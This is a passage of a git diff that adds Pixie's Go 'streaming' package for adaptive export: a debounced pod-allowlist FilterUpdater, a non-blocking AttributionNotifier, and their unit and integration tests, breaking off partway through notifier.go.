+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+load("//bazel:pl_build_system.bzl", "pl_go_test")
+
+go_library(
+ name = "streaming",
+ srcs = [
+ "filter.go",
+ "notifier.go",
+ "scanner.go",
+ "supervisor.go",
+ "writer.go",
+ ],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/streaming",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ "//src/vizier/services/adaptive_export/internal/reconcile",
+ "@com_github_sirupsen_logrus//:logrus",
+ ],
+)
+
+pl_go_test(
+ name = "streaming_test",
+ srcs = [
+ "filter_test.go",
+ "integration_test.go",
+ "notifier_test.go",
+ "scanner_test.go",
+ ],
+ embed = [":streaming"],
+ deps = [
+ "//src/vizier/services/adaptive_export/internal/activeset",
+ ],
+)
diff --git a/src/vizier/services/adaptive_export/internal/streaming/filter.go b/src/vizier/services/adaptive_export/internal/streaming/filter.go
new file mode 100644
index 00000000000..195fccf30cc
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/filter.go
@@ -0,0 +1,258 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package streaming implements the rev-3 push-flow: long-running
+// PxL submissions per pixie table, with a pod allowlist derived from
+// the ActiveSet. See .local/adaptive-write-rev3-plan.md for the full
+// architectural rationale.
+package streaming
+
+import (
+ "context"
+ "sync"
+ "time"
+
+ log "github.com/sirupsen/logrus"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// FilterMode selects how the embedded PxL allowlist is constructed.
+type FilterMode int
+
+const (
+ // FilterModeAllowlist embeds an explicit pod list in the PxL
+ // `df = df[df.pod.in_([...])]` clause. Optimal while the set is
+ // small.
+ FilterModeAllowlist FilterMode = iota
+
+ // FilterModeUnfiltered emits the script WITHOUT a pod filter —
+ // the stream returns ALL pods on this node. Used when the active
+ // set exceeds MaxAllowlistSize: the PxL script-size limit + parse
+ // cost would dominate; we prefer to pull everything and filter
+ // in the operator's CH writer. Memory-speed filtering beats
+ // linear-in-N PxL parse cost.
+ FilterModeUnfiltered
+)
+
+// String for log output.
+func (m FilterMode) String() string {
+ switch m {
+ case FilterModeAllowlist:
+ return "allowlist"
+ case FilterModeUnfiltered:
+ return "unfiltered"
+ default:
+ return "unknown"
+ }
+}
+
+// Filter is the immutable snapshot that a TableScanner uses to
+// produce one PxL submission.
+type Filter struct {
+ Mode FilterMode
+ Pods []activeset.Key // populated iff Mode == Allowlist
+ Version uint64 // ActiveSet version this filter was derived from
+}
+
+// UpdaterConfig tunes the FilterUpdater.
+type UpdaterConfig struct {
+ // Debounce coalesces multiple ActiveSet deltas into one filter
+ // emission. With many concurrent activations (e.g. cluster-wide
+ // incident), this caps re-submission rate at 1 / Debounce per
+ // TableScanner. 0 → 1 second default.
+ Debounce time.Duration
+
+ // MaxAllowlistSize is the threshold at which we switch to
+ // FilterModeUnfiltered. 0 → 500 default. -1 disables the cap
+ // (allowlist always; PxL parse cost is yours to own).
+ MaxAllowlistSize int
+
+ // SubscribeBuffer is the per-subscriber delta buffer size on the
+ // underlying ActiveSet subscription. 0 → 32 default.
+ SubscribeBuffer int
+}
+
+func (c UpdaterConfig) defaulted() UpdaterConfig {
+ if c.Debounce <= 0 {
+ c.Debounce = 1 * time.Second
+ }
+ if c.MaxAllowlistSize == 0 {
+ c.MaxAllowlistSize = 500
+ }
+ if c.SubscribeBuffer <= 0 {
+ c.SubscribeBuffer = 32
+ }
+ return c
+}
+
+// FilterUpdater bridges ActiveSet → TableScanner. It subscribes to
+// ActiveSet deltas, debounces them, and emits a coalesced Filter on
+// its output channel. Run() owns one goroutine.
+type FilterUpdater struct {
+ set *activeset.ActiveSet
+ cfg UpdaterConfig
+
+ // deltaCh is the underlying ActiveSet subscription, established
+ // at construction (not in Run) so callers can deterministically
+ // Upsert into `set` after NewUpdater returns and know those
+ // upserts will be delivered. Without this, Run's goroutine
+ // might not have subscribed to the set yet when the first
+ // Upsert lands → silent drop.
+ deltaCh <-chan activeset.Delta
+
+ mu sync.Mutex
+ subs []chan Filter
+ closed bool
+}
+
+// NewUpdater wires an updater AND establishes its ActiveSet
+// subscription. Call Run(ctx) to start its goroutine.
+func NewUpdater(set *activeset.ActiveSet, cfg UpdaterConfig) *FilterUpdater {
+ d := cfg.defaulted()
+ return &FilterUpdater{
+ set: set,
+ cfg: d,
+ deltaCh: set.Subscribe(d.SubscribeBuffer),
+ }
+}
+
+// Subscribe returns a buffered channel that receives a fresh Filter
+// after each debounce window in which one or more deltas landed.
+// Plus one initial Filter representing the current snapshot, so a
+// subscriber can build its first PxL submission without waiting.
+//
+// Channel is closed when ctx (from Run) is cancelled.
+func (u *FilterUpdater) Subscribe() <-chan Filter {
+ u.mu.Lock()
+ defer u.mu.Unlock()
+ ch := make(chan Filter, 4)
+ if !u.closed {
+ // Seed with the current snapshot so first PxL submission
+ // doesn't have to wait for a delta to arrive.
+ ch <- u.computeFilter()
+ }
+ u.subs = append(u.subs, ch)
+ return ch
+}
+
+// Run owns the FilterUpdater goroutine until ctx is cancelled.
+//
+// Lifecycle:
+//
+// deltaCh = set.Subscribe(buffer)
+// for {
+// select {
+// case <-ctx.Done(): close subs; return
+// case <-deltaCh: schedule a fire at now+Debounce (idempotent)
+// case <-fireTimer: compute filter; broadcast to subs
+// }
+// }
+//
+// The fire-timer is rearmed only when a delta arrives; in steady
+// state with no deltas, this goroutine is dormant.
+func (u *FilterUpdater) Run(ctx context.Context) {
+ defer u.closeSubs()
+ defer u.set.Unsubscribe(u.deltaCh)
+
+ var pendingTimer *time.Timer
+ var pendingC <-chan time.Time
+ arm := func() {
+ if pendingTimer != nil {
+ return // already scheduled
+ }
+ pendingTimer = time.NewTimer(u.cfg.Debounce)
+ pendingC = pendingTimer.C
+ }
+ disarm := func() {
+ if pendingTimer != nil {
+ pendingTimer.Stop()
+ pendingTimer = nil
+ pendingC = nil
+ }
+ }
+
+ for {
+ select {
+ case <-ctx.Done():
+ disarm()
+ return
+
+ case _, ok := <-u.deltaCh:
+ if !ok {
+ // ActiveSet shutdown: disarm any pending timer so its
+ // goroutine doesn't outlive Run trying to send on
+ // pendingC (CodeRabbit r3379377645).
+ disarm()
+ return
+ }
+ arm()
+
+ case <-pendingC:
+ disarm()
+ f := u.computeFilter()
+ u.broadcast(f)
+ log.WithFields(log.Fields{
+ "mode": f.Mode,
+ "pods": len(f.Pods),
+ "version": f.Version,
+ }).Info("streaming.FilterUpdater: emitted filter")
+ }
+ }
+}
+
+// computeFilter snapshots the ActiveSet and decides whether to embed
+// an allowlist or fall back to unfiltered mode based on size.
+func (u *FilterUpdater) computeFilter() Filter {
+ keys, version := u.set.Snapshot()
+ if u.cfg.MaxAllowlistSize > 0 && len(keys) > u.cfg.MaxAllowlistSize {
+ return Filter{Mode: FilterModeUnfiltered, Version: version}
+ }
+ return Filter{Mode: FilterModeAllowlist, Pods: keys, Version: version}
+}
+
+// broadcast non-blockingly delivers to every subscriber. Subscribers
+// that fall behind get the OLDEST filter dropped — the newest state
+// always reaches them (their PxL re-submission is what matters; old
+// filter versions are stale by construction).
+func (u *FilterUpdater) broadcast(f Filter) {
+ u.mu.Lock()
+ defer u.mu.Unlock()
+ for _, ch := range u.subs {
+ select {
+ case ch <- f:
+ default:
+ select {
+ case <-ch:
+ default:
+ }
+ select {
+ case ch <- f:
+ default:
+ }
+ }
+ }
+}
+
+func (u *FilterUpdater) closeSubs() {
+ u.mu.Lock()
+ defer u.mu.Unlock()
+ u.closed = true
+ for _, ch := range u.subs {
+ close(ch)
+ }
+ u.subs = nil
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/filter_test.go b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go
new file mode 100644
index 00000000000..a9167261377
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/filter_test.go
@@ -0,0 +1,233 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+func TestFilterUpdater_DebouncesMultipleDeltas(t *testing.T) {
+ set := activeset.New()
+ u := NewUpdater(set, UpdaterConfig{Debounce: 50 * time.Millisecond})
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ go u.Run(ctx)
+ ch := u.Subscribe()
+
+ // Drain the initial snapshot (empty).
+ <-ch
+
+ // Bombard with 10 distinct upserts inside the debounce window.
+ for i := 0; i < 10; i++ {
+ set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
+ }
+
+ // Wait one debounce window + slack and count how many filter
+ // emissions arrived. Should be exactly one — the coalesced one.
+ deadline := time.After(300 * time.Millisecond)
+ count := 0
+ var lastF Filter
+ collecting := true
+ for collecting {
+ select {
+ case f := <-ch:
+ count++
+ lastF = f
+ case <-deadline:
+ collecting = false
+ }
+ }
+ if count != 1 {
+ t.Fatalf("expected 1 coalesced filter emission, got %d", count)
+ }
+ if len(lastF.Pods) != 10 {
+ t.Fatalf("expected 10 pods in coalesced filter, got %d", len(lastF.Pods))
+ }
+}
+
+func TestFilterUpdater_FallsBackToUnfilteredOnSizeCap(t *testing.T) {
+ set := activeset.New()
+ u := NewUpdater(set, UpdaterConfig{
+ Debounce: 20 * time.Millisecond,
+ MaxAllowlistSize: 3,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ go u.Run(ctx)
+ ch := u.Subscribe()
+ <-ch // initial empty
+
+ for i := 0; i < 5; i++ {
+ set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
+ }
+ select {
+ case f := <-ch:
+ if f.Mode != FilterModeUnfiltered {
+ t.Fatalf("expected unfiltered mode (5 > cap 3), got %v", f.Mode)
+ }
+ case <-time.After(200 * time.Millisecond):
+ t.Fatalf("no filter emission")
+ }
+}
+
+// TestFilterUpdater_CapBoundary_AtLimit — exactly MaxAllowlistSize
+// pods MUST stay in allowlist mode (not flip to unfiltered).
+func TestFilterUpdater_CapBoundary_AtLimit(t *testing.T) {
+ set := activeset.New()
+ u := NewUpdater(set, UpdaterConfig{
+ Debounce: 10 * time.Millisecond,
+ MaxAllowlistSize: 3,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ go u.Run(ctx)
+ ch := u.Subscribe()
+ <-ch
+ for i := 0; i < 3; i++ {
+ set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
+ }
+ f := waitForFilter(t, ch, 300*time.Millisecond)
+ if f.Mode != FilterModeAllowlist {
+ t.Fatalf("at exactly cap=3, expected allowlist, got %v", f.Mode)
+ }
+ if len(f.Pods) != 3 {
+ t.Fatalf("expected 3 pods in allowlist, got %d", len(f.Pods))
+ }
+}
+
+// TestFilterUpdater_CapBoundary_OneOverLimit — cap+1 pods MUST flip
+// to unfiltered. This is the exact boundary just above the cap.
+func TestFilterUpdater_CapBoundary_OneOverLimit(t *testing.T) {
+ set := activeset.New()
+ u := NewUpdater(set, UpdaterConfig{
+ Debounce: 10 * time.Millisecond,
+ MaxAllowlistSize: 3,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ go u.Run(ctx)
+ ch := u.Subscribe()
+ <-ch
+ for i := 0; i < 4; i++ {
+ set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
+ }
+ f := waitForFilter(t, ch, 300*time.Millisecond)
+ if f.Mode != FilterModeUnfiltered {
+ t.Fatalf("at cap+1=4, expected unfiltered, got %v with %d pods", f.Mode, len(f.Pods))
+ }
+}
+
+// TestFilterUpdater_CapBoundary_RecoversAfterShrink — going from
+// unfiltered (set was huge) back to a small set MUST switch back to
+// allowlist mode. Without this, a transient burst that hit the cap
+// would force unfiltered mode forever.
+func TestFilterUpdater_CapBoundary_RecoversAfterShrink(t *testing.T) {
+ set := activeset.New()
+ u := NewUpdater(set, UpdaterConfig{
+ Debounce: 10 * time.Millisecond,
+ MaxAllowlistSize: 3,
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ go u.Run(ctx)
+ ch := u.Subscribe()
+ <-ch
+
+ // Burst above cap.
+ for i := 0; i < 10; i++ {
+ set.Upsert(activeset.Key{Pod: string(rune('a' + i))}, time.Now().Add(time.Minute))
+ }
+ f := waitForFilter(t, ch, 300*time.Millisecond)
+ if f.Mode != FilterModeUnfiltered {
+ t.Fatalf("expected unfiltered after burst, got %v", f.Mode)
+ }
+ // Shrink back below cap.
+ for i := 3; i < 10; i++ {
+ set.Remove(activeset.Key{Pod: string(rune('a' + i))})
+ }
+ // Drain any intermediate filters; verify the LATEST emission is
+ // back to allowlist mode.
+ deadline := time.Now().Add(500 * time.Millisecond)
+ last := f
+ for time.Now().Before(deadline) {
+ select {
+ case last = <-ch:
+ case <-time.After(100 * time.Millisecond):
+ }
+ if last.Mode == FilterModeAllowlist {
+ return // recovered
+ }
+ }
+ t.Fatalf("did not recover to allowlist mode after shrink; last mode=%v pods=%d",
+ last.Mode, len(last.Pods))
+}
+
+// TestFilterUpdater_CapDisabled_AllowsAnySize — when MaxAllowlistSize <= 0
+// the cap is disabled and even very large sets stay in allowlist mode.
+func TestFilterUpdater_CapDisabled_AllowsAnySize(t *testing.T) {
+ set := activeset.New()
+ u := NewUpdater(set, UpdaterConfig{
+ Debounce: 10 * time.Millisecond,
+ MaxAllowlistSize: -1, // explicit disable
+ })
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ go u.Run(ctx)
+ ch := u.Subscribe()
+ <-ch
+ for i := 0; i < 100; i++ {
+ set.Upsert(activeset.Key{Pod: string(rune('a'+i%26)) + string(rune('a'+i/26))}, time.Now().Add(time.Minute))
+ }
+ f := waitForFilter(t, ch, 300*time.Millisecond)
+ if f.Mode != FilterModeAllowlist {
+ t.Fatalf("with cap disabled (=-1), expected allowlist; got %v", f.Mode)
+ }
+}
+
+// waitForFilter polls ch until a filter shows up, returning it.
+func waitForFilter(t *testing.T, ch <-chan Filter, timeout time.Duration) Filter {
+ t.Helper()
+ select {
+ case f := <-ch:
+ return f
+ case <-time.After(timeout):
+ t.Fatalf("no filter within %v", timeout)
+ return Filter{}
+ }
+}
+
+func TestFilterUpdater_InitialSnapshotIsSeeded(t *testing.T) {
+ set := activeset.New()
+ set.Upsert(activeset.Key{Namespace: "n", Pod: "p1"}, time.Now().Add(time.Minute))
+ u := NewUpdater(set, UpdaterConfig{Debounce: 50 * time.Millisecond})
+ ctx, cancel := context.WithCancel(context.Background())
+ defer cancel()
+ go u.Run(ctx)
+ ch := u.Subscribe()
+ select {
+ case f := <-ch:
+ if len(f.Pods) != 1 || f.Pods[0].Pod != "p1" {
+ t.Fatalf("initial snapshot wrong: %+v", f)
+ }
+ case <-time.After(200 * time.Millisecond):
+ t.Fatalf("no initial filter")
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/integration_test.go b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go
new file mode 100644
index 00000000000..40e31870a78
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/integration_test.go
@@ -0,0 +1,268 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "strings"
+ "sync"
+ "sync/atomic"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// recordingQuerier captures every PxL string + lets the test inject
+// a per-call row count. Useful for verifying that the PxL the scanner
+// emits actually carries the allowlist the test set up upstream.
+type recordingQuerier struct {
+ mu sync.Mutex
+ queries []string
+ rowsFunc func(pxl string) []map[string]any
+}
+
+func (r *recordingQuerier) Query(_ context.Context, pxl string) ([]map[string]any, error) {
+ r.mu.Lock()
+ r.queries = append(r.queries, pxl)
+ r.mu.Unlock()
+ if r.rowsFunc == nil {
+ return nil, nil
+ }
+ return r.rowsFunc(pxl), nil
+}
+
+func (r *recordingQuerier) all() []string {
+ r.mu.Lock()
+ defer r.mu.Unlock()
+ out := make([]string, len(r.queries))
+ copy(out, r.queries)
+ return out
+}
+
+// countingWriter is a SinkWriter that just counts rows landed
+// per-table — proxies an integration-grade check without standing
+// up a real CH.
+type countingWriter struct {
+ mu sync.Mutex
+ perTable map[string]int64
+ calls atomic.Int64
+}
+
+func newCountingWriter() *countingWriter {
+ return &countingWriter{perTable: map[string]int64{}}
+}
+
+func (w *countingWriter) WritePixieRows(_ context.Context, table string, rows []map[string]any) error {
+ w.mu.Lock()
+ defer w.mu.Unlock()
+ w.perTable[table] += int64(len(rows))
+ w.calls.Add(1)
+ return nil
+}
+
+func (w *countingWriter) count(table string) int64 {
+ w.mu.Lock()
+ defer w.mu.Unlock()
+ return w.perTable[table]
+}
+
+// TestIntegration_NotifierToScannerAllowlistFlow — exercises the
+// whole rev-3 pipeline minus pixie:
+//
+// AttributionNotifier.Submit
+// → ActiveSet.Upsert
+// → FilterUpdater (debounce)
+// → TableScanner.buildPxL (allowlist embedded)
+// → recordingQuerier (verify PxL contains pod names)
+// → BatchWriter (verify rows reach sink)
+//
+// The whole chain runs against fake pixie + fake sink so we can
+// assert on PxL strings + row counts deterministically.
+func TestIntegration_NotifierToScannerAllowlistFlow(t *testing.T) {
+ ctx, cancel := context.WithTimeout(context.Background(), 3*time.Second)
+ defer cancel()
+
+ // Wire up the chain.
+ set := activeset.New()
+ notif := NewAttributionNotifier(set, NotifierConfig{BufferSize: 128})
+ updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond})
+ q := &recordingQuerier{
+ rowsFunc: func(pxl string) []map[string]any {
+ // Return 3 rows iff the allowlist contains "wantpod"; else 0.
+ if strings.Contains(pxl, "wantpod") {
+ return []map[string]any{{"a": 1}, {"a": 2}, {"a": 3}}
+ }
+ return nil
+ },
+ }
+ w := newCountingWriter()
+ writer := NewBatchWriter("pgsql_events", w, WriterConfig{
+ BatchEvery: 50 * time.Millisecond,
+ BatchRows: 1000,
+ })
+ scanner := NewScanner(ScannerConfig{
+ Table: "pgsql_events",
+ RefreshInterval: 30 * time.Millisecond,
+ QueryTimeout: 500 * time.Millisecond,
+ }, q, writer, updater.Subscribe())
+
+ // Spin everything up.
+ var wg sync.WaitGroup
+ wg.Add(4)
+ go func() { defer wg.Done(); notif.Run(ctx) }()
+ go func() { defer wg.Done(); updater.Run(ctx) }()
+ go func() { defer wg.Done(); writer.Run(ctx) }()
+ go func() { defer wg.Done(); scanner.Run(ctx) }()
+
+ // Push two pods through the controller-facing API.
+ notif.Submit(activeset.Key{Namespace: "n", Pod: "wantpod"}, time.Now().Add(time.Minute))
+ notif.Submit(activeset.Key{Namespace: "n", Pod: "other"}, time.Now().Add(time.Minute))
+
+ // Wait for the writer to land non-zero rows.
+ deadline := time.Now().Add(2 * time.Second)
+ for w.count("pgsql_events") == 0 && time.Now().Before(deadline) {
+ time.Sleep(20 * time.Millisecond)
+ }
+ got := w.count("pgsql_events")
+ if got < 3 {
+ t.Fatalf("expected ≥3 rows written for pgsql_events, got %d", got)
+ }
+
+ // Assert the PxL carried BOTH pods.
+ found := q.all()
+ if len(found) == 0 {
+ t.Fatalf("no PxL queries captured")
+ }
+ last := found[len(found)-1]
+ if !strings.Contains(last, "wantpod") || !strings.Contains(last, "other") {
+ t.Fatalf("last PxL missing one of the pods:\n%s", last)
+ }
+
+ cancel()
+ wg.Wait()
+}
+
+// TestIntegration_EmptyActiveSetSkipsAllQueries — when nothing is
+// active, the scanner must NOT issue queries at all.
+func TestIntegration_EmptyActiveSetSkipsAllQueries(t *testing.T) {
+ ctx, cancel := context.WithTimeout(context.Background(), 500*time.Millisecond)
+ defer cancel()
+
+ set := activeset.New()
+ updater := NewUpdater(set, UpdaterConfig{Debounce: 10 * time.Millisecond})
+ q := &recordingQuerier{rowsFunc: func(string) []map[string]any { return nil }}
+ w := newCountingWriter()
+ writer := NewBatchWriter("redis_events", w, WriterConfig{BatchEvery: 50 * time.Millisecond})
+ scanner := NewScanner(ScannerConfig{Table: "redis_events", RefreshInterval: 30 * time.Millisecond}, q, writer, updater.Subscribe())
+
+ var wg sync.WaitGroup
+ wg.Add(3)
+ go func() { defer wg.Done(); updater.Run(ctx) }()
+ go func() { defer wg.Done(); writer.Run(ctx) }()
+ go func() { defer wg.Done(); scanner.Run(ctx) }()
+
+ <-ctx.Done()
+ wg.Wait()
+
+ if len(q.all()) != 0 {
+ t.Fatalf("scanner issued %d queries against empty active set; expected 0", len(q.all()))
+ }
+}
+
+// TestIntegration_PrunePropagatesToScannerAllowlist — when the
+// controller's prune fires, the scanner's next PxL must omit the
+// pruned pod.
+func TestIntegration_PrunePropagatesToScannerAllowlist(t *testing.T) {
+ ctx, cancel := context.WithTimeout(context.Background(), 2*time.Second)
+ defer cancel()
+
+ set := activeset.New()
+ notif := NewAttributionNotifier(set, NotifierConfig{BufferSize: 64})
+ updater := NewUpdater(set, UpdaterConfig{Debounce: 20 * time.Millisecond})
+ q := &recordingQuerier{}
+ w := newCountingWriter()
+ writer := NewBatchWriter("http_events", w, WriterConfig{BatchEvery: 50 * time.Millisecond})
+ scanner := NewScanner(ScannerConfig{Table: "http_events", RefreshInterval: 30 * time.Millisecond}, q, writer, updater.Subscribe())
+
+ var wg sync.WaitGroup
+ wg.Add(4)
+ go func() { defer wg.Done(); notif.Run(ctx) }()
+ go func() { defer wg.Done(); updater.Run(ctx) }()
+ go func() { defer wg.Done(); writer.Run(ctx) }()
+ go func() { defer wg.Done(); scanner.Run(ctx) }()
+
+ // Add a SECOND pod so the scanner keeps issuing queries after
+ // we Remove "soon-pruned" (else it'd just sit in empty-allowlist
+ // mode and we'd have no way to deterministically witness the
+ // filter change).
+ notif.Submit(activeset.Key{Pod: "soon-pruned"}, time.Now().Add(time.Minute))
+ notif.Submit(activeset.Key{Pod: "stays"}, time.Now().Add(time.Minute))
+ waitForQueryContaining(t, q, "soon-pruned", time.Second)
+
+ preCount := len(q.all())
+ notif.SubmitRemove(activeset.Key{Pod: "soon-pruned"})
+
+ // Event-driven wait: poll until a query AFTER preCount appears
+ // that does NOT contain the pruned pod. That's the witness that
+ // the filter update has propagated through notifier → activeset →
+ // updater (debounce) → scanner. Cap at 2 s.
+ deadline := time.Now().Add(2 * time.Second)
+ for time.Now().Before(deadline) {
+ all := q.all()
+ for i := preCount; i < len(all); i++ {
+ if !strings.Contains(all[i], "soon-pruned") {
+ // Found the post-prune query without the pod.
+ // Now also assert that NO query in this post-prune
+ // window contains the pod (defense against a stale
+ // in-flight submission landing AFTER the new one).
+ for j := preCount; j < len(all); j++ {
+ if strings.Contains(all[j], "soon-pruned") && j > i {
+ cancel()
+ wg.Wait()
+ t.Fatalf("post-prune query at idx %d contains pruned pod after a clean query at idx %d:\n%s",
+ j, i, all[j])
+ }
+ }
+ cancel()
+ wg.Wait()
+ return
+ }
+ }
+ time.Sleep(20 * time.Millisecond)
+ }
+ cancel()
+ wg.Wait()
+ t.Fatalf("scanner kept issuing queries containing 'soon-pruned' for 2s after Remove; captured %d queries",
+ len(q.all())-preCount)
+}
+
+// waitForQueryContaining polls the recorder until a query containing
+// `needle` appears OR timeout fires.
+func waitForQueryContaining(t *testing.T, q *recordingQuerier, needle string, timeout time.Duration) {
+ t.Helper()
+ deadline := time.Now().Add(timeout)
+ for time.Now().Before(deadline) {
+ for _, pxl := range q.all() {
+ if strings.Contains(pxl, needle) {
+ return
+ }
+ }
+ time.Sleep(10 * time.Millisecond)
+ }
+ t.Fatalf("no query containing %q within %v; captured: %v", needle, timeout, q.all())
+}
diff --git a/src/vizier/services/adaptive_export/internal/streaming/notifier.go b/src/vizier/services/adaptive_export/internal/streaming/notifier.go
new file mode 100644
index 00000000000..2921630a2ab
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/streaming/notifier.go
@@ -0,0 +1,166 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package streaming
+
+import (
+ "context"
+ "sync/atomic"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset"
+)
+
+// AttributionNotifier decouples the controller's per-event callback
+// (controller.handle) from ActiveSet writes. Without this shim, a
+// stalled ActiveSet subscriber (e.g. a slow Supervisor under load)
+// could back-pressure controller.handle and stall trigger consumption
+// — i.e. lose the operator's main invariant: kubescape events are
+// processed in time.
+//
+// Contract:
+// - Submit / SubmitRemove NEVER block. They drop on buffer overflow
+// and bump DroppedCount.
+// - One Run goroutine consumes the buffer and applies to ActiveSet.
+// - Filtered (host-pid / empty pod) events are counted separately so
+// drops vs filters can be distinguished in metrics.
+type AttributionNotifier struct {
+ set *activeset.ActiveSet
+ cfg NotifierConfig
+ in chan notifyEvent
+
+ dropped atomic.Int64
+ filtered atomic.Int64
+}
+
+// NotifierConfig tunes the notifier. Zero → safe defaults.
+type NotifierConfig struct {
+ // BufferSize is the input chan capacity. 0 → 1024 default.
+ // Larger absorbs longer consumer stalls; smaller fails faster.
+ // Producer drops the OLDEST event on overflow (we'd rather lose
+ // stale activations than fresh ones).
+ BufferSize int
+}
+
+func (c NotifierConfig) defaulted() NotifierConfig {
+ if c.BufferSize <= 0 {
+ c.BufferSize = 1024
+ }
+ return c
+}
+
+// notifyEvent is the discriminated-union we send across the buffer.
+type notifyEvent struct {
+ key activeset.Key
+ tEnd time.Time
+ remove bool
+}
+
+// NewAttributionNotifier wires a notifier. Call Run(ctx) to start
+// the consumer goroutine.
+func NewAttributionNotifier(set *activeset.ActiveSet, cfg NotifierConfig) *AttributionNotifier {
+ c := cfg.defaulted()
+ return &AttributionNotifier{
+ set: set,
+ cfg: c,
+ in: make(chan notifyEvent, c.BufferSize),
+ }
+}
+
+// Submit hands an upsert to the notifier. Never blocks. Drops oldest
+// on overflow + bumps DroppedCount. Host-pid (empty Pod) events are
+// filtered here so the ActiveSet never sees them.
+func (n *AttributionNotifier) Submit(key activeset.Key, tEnd time.Time) {
+ if key.Pod == "" {
+ n.filtered.Add(1)
+ return
+ }
+ n.send(notifyEvent{key: key, tEnd: tEnd})
+}
+
+// SubmitRemove hands a removal. Same non-blocking contract as Submit.
+func (n *AttributionNotifier) SubmitRemove(key activeset.Key) {
+ if key.Pod == "" {
+ n.filtered.Add(1)
+ return
+ }
+ n.send(notifyEvent{key: key, remove: true})
+}
+
+// send is the non-blocking enqueue with drop-oldest semantics.
+func (n *AttributionNotifier) send(e notifyEvent) {
+ select {
+ case n.in <- e:
+ default:
+ // Drop the OLDEST event then retry. If retry still fails
+ // (consumer drained between the two operations and another
+ // producer raced in), count this submit as dropped.
+ select {
+ case <-n.in:
+ n.dropped.Add(1)
+ default:
+ }
+ select {
+ case n.in <- e:
+ default:
+ n.dropped.Add(1)
+ }
+ }
+}
+
+// Run owns one goroutine; drains the buffer until ctx cancellation.
+// Best-effort drain on shutdown — anything remaining in the buffer
+// after ctx.Done is dropped.
+func (n *AttributionNotifier) Run(ctx context.Context) {
+ for {
+ select {
+ case <-ctx.Done():
+ return
+ case e := <-n.in:
+ if e.remove {
+ n.set.Remove(e.key)
+ } else {
+ n.set.Upsert(e.key, e.tEnd)
+ }
+ }
+ }
+}
+
+// DroppedCount returns the number of events lost to buffer overflow.
+// Use this as a backpressure signal — non-zero means the consumer
+// can't keep up.
+func (n *AttributionNotifier) DroppedCount() int64 { return n.dropped.Load() }
+
+// FilteredCount returns the number of events filtered (empty pod).
+func (n *AttributionNotifier) FilteredCount() int64 { return n.filtered.Load() }
+
+// SubmitFromController is a tiny convenience wrapper that matches
+// the controller.Config.OnAttribution signature exactly, for
+// idiomatic wiring in main.go:
+//
+// ctlCfg.OnAttribution = notifier.SubmitFromController
+func (n *AttributionNotifier) SubmitFromController(namespace, pod string, tEnd time.Time) {
